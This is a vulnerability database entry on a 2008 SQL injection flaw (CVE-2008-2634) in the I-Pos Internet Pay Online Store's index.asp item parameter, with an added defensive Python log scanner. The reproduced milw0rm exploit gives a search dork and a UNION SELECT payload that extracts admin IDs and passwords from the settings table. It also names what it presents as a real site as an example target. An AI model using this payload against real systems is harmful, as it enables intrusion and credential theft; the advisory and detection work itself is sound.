bearriver i-pos_internet_pay_online_store index.asp SQL Injection Vulnerability

Vulnerability ID: 1115323
Vulnerability type: SQL injection
Published: 2008-06-01
Updated: 2008-06-09
CVE ID: CVE-2008-2634
CNNVD-ID: CNNVD-200806-135
Platform: ASP
CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/5717
https://www.securityfocus.com/bid/81328
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-135
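|Vulnerability Details
index.asp in I-Pos Internet Pay Online Store 1.3 Beta 2 and earlier contains a SQL injection vulnerability. Remote attackers can execute arbitrary SQL commands via the item parameter.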
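
A defender-side check for the flaw described above, as an added example that is not part of the original entry or the product's code: it scans web server logs for index.asp requests whose item value is not a plain integer. The log lines are constructed, and both the W3C field layout and the idea that a legitimate item is a short numeric ID are assumptions.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C-style log lines (illustrative only, not from a real server).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-06-02 10:01:11 192.0.2.10 GET /store/index.asp item=42 200
2008-06-02 10:01:15 192.0.2.11 GET /store/index.asp item=-50+union+select+0,1,2+from+t 200
2008-06-02 10:01:19 192.0.2.12 GET /store/index.asp item=7%20OR%201%3D1 500
2008-06-02 10:01:23 192.0.2.10 GET /store/cart.asp item=abc 200
2008-06-02 10:01:27 192.0.2.13 GET /store/INDEX.ASP ITEM=13 200
"""

# Assumption: a legitimate item value is a short non-negative integer ID.
VALID_ITEM = re.compile(r"[0-9]{1,9}")


def suspicious_item_requests(log_text):
    """Return (client_ip, decoded_item) for index.asp hits with a non-integer item."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names declared by the log header
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # IIS paths and ASP parameter names are case-insensitive.
        if not row.get("cs-uri-stem", "").lower().endswith("/index.asp"):
            continue
        query = row.get("cs-uri-query", "-")
        if query == "-":
            continue
        # parse_qsl URL-decodes values, so %20 and + both become spaces.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name.lower() == "item" and not VALID_ITEM.fullmatch(value):
                hits.append((row.get("c-ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_item_requests(SAMPLE_LOG):
        print(f"{ip} sent non-integer item: {value!r}")
```

The same integer-only rule, applied in index.asp before the value reaches the query, is the corresponding input check on the server side.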
|Vulnerability Exploit (EXP)
[+] Title : I-Pos Internet Pay Online Store v1.3 Beta <= Remote SQL Injection Vulnerability

==========================================================================================

[+] Author : KnocKout
[+] Special ThanX : Dr.Kacak & Cr@zy-King and CW ALL USERS . . .
[+] Cyber-Warrior.Org

===========================================================================================

S. Name : I-Pos Internet Pay Online Store
Version : 1.3 Beta
Download : http://www.asprehberi.net/Indir.asp?IcerikID=1812&SessionID=358055325
Dork : "Powered by i-pos Storefront"

Attackz;

Http://Localsite.com/path/index.asp?item=[SQL Injection]

Example Attack: http://localsite.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings
Example Site: www.keysquality.com/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings

######################################################################################################

# milw0rm.com [2008-06-01]
|Affected Products
Bearrivernet.Net I-Pos Internet Pay Online Store 1.3 BETA
Bearrivernet.Net I-Pos Internet Pay Online Store 1.1 Beta
|References

Source: XF
Name: ipos-item-sql-injection(42786)
Link: http://xforce.iss.net/xforce/xfdb/42786
Source: MILW0RM
Name: 5717
Link: http://www.milw0rm.com/exploits/5717